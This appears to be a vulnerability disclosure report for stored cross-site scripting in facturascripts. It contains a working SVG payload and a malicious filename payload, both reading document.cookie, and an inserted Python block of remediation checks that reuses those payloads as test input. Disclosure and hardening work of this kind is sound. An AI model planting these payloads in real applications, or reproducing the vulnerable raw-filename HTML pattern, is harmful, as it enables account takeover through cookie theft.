Multiple Stored XSS via uploaded SVG file and attachment file name in neorazorx/facturascripts

Valid

Reported on

Apr 27th 2022


Description

Hi there, facturascripts is vulnerable to stored XSS via an uploaded SVG file and via the attachment filename.

Steps to reproduce with an SVG file

Log in as admin, or as any account with the Admin->Library role, go to Admin -> Library -> New and upload an SVG file with this content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>

Save it. The XSS triggers when you download the file.

(screenshot: xss4.png)

Steps to reproduce with a file-name payload

Upload any file named %22><img src=x onerror=alert(document.cookie).xlsx and the XSS triggers.
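A constructed example, added here and not part of the report or of FacturaScripts' own code, of the three server-side checks that close both vectors above: rejecting SVG uploads that carry active content, serving library files as attachments rather than inline, and HTML-escaping the stored filename before it is written into the attachment list. The function names, the /download/ path and the decoded form of the filename payload (the report writes the quote as %22) are assumptions for illustration.

```python
"""
Constructed example, not FacturaScripts code: three checks that close the
two stored-XSS vectors in this report.

 1. svg_is_safe()            refuse SVG uploads carrying active content
 2. download_headers()       serve library files as attachments, never inline
 3. render_attachment_link() HTML-escape the stored filename in the listing
"""
import html
import re
import xml.etree.ElementTree as ET
from urllib.parse import quote

# The report's SVG payload, embedded here as constructed test input.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>"""

# A harmless SVG that the same check must still accept (constructed).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""

# The report's filename payload, with %22 decoded to a literal quote (assumption).
FILENAME_PAYLOAD = '"><img src=x onerror=alert(document.cookie).xlsx'


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def svg_is_safe(data: bytes) -> bool:
    """Return True only if the document is an <svg> with no script-capable content.

    Rejected: <script>, <foreignObject>, any on* event-handler attribute, and
    any href (plain or xlink:) that starts with javascript:.
    For untrusted XML in production, parse with defusedxml instead of ET.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    if _local(root.tag) != "svg":
        return False
    for el in root.iter():
        if not isinstance(el.tag, str):      # skip comments / processing instructions
            continue
        if _local(el.tag) in ("script", "foreignobject"):
            return False
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.startswith("on"):           # onload, onerror, onclick, ...
                return False
            if a == "href" and re.match(r"\s*javascript:", value, re.I):
                return False
    return True


def download_headers(filename: str) -> dict:
    """Response headers that make the browser save the file instead of rendering it.

    With these, even an SVG the upload check missed is never rendered inline
    from the application's origin, so its script cannot reach the app's cookies.
    """
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "download"
    return {
        "Content-Type": "application/octet-stream",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe}"',
    }


def render_attachment_link_vulnerable(filename: str) -> str:
    """The pattern the filename vector exploits: raw filename interpolated into HTML."""
    return f'<a href="/download/{filename}">{filename}</a>'


def render_attachment_link(filename: str) -> str:
    """Hardened form: URL-encode the filename in the href, HTML-escape it in the text."""
    return (f'<a href="/download/{quote(filename, safe="")}">'
            f'{html.escape(filename, quote=True)}</a>')
```

The denylist in svg_is_safe is deliberately short so the logic stays readable; a production filter should prefer an allowlist of elements and attributes, and the attachment headers are the check that still holds when the filter misses a case.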

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

Timeline

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours.
Minh modified the report (twice).
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back.
Carlos Garcia validated this vulnerability.
Minh has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Carlos Garcia marked this as fixed in 2022.06 with commit 1d1edb.
The fix bounty has been dropped.
This vulnerability will not receive a CVE.
Minh
a year ago

Researcher


Carlos Garcia
a year ago

Maintainer


You're right. I have corrected it in this commit https://github.com/NeoRazorX/facturascripts/commit/a5e64bb5f29367e072dfc984e775731c6b3dd8f4

Thank you so much for everything

Minh
a year ago

Researcher


@admin, could you please assign a CVE for this report?

Carlos Garcia
a year ago

Maintainer


That option is hidden to me

Jamie Slome
a year ago

Admin


Sorted 👍
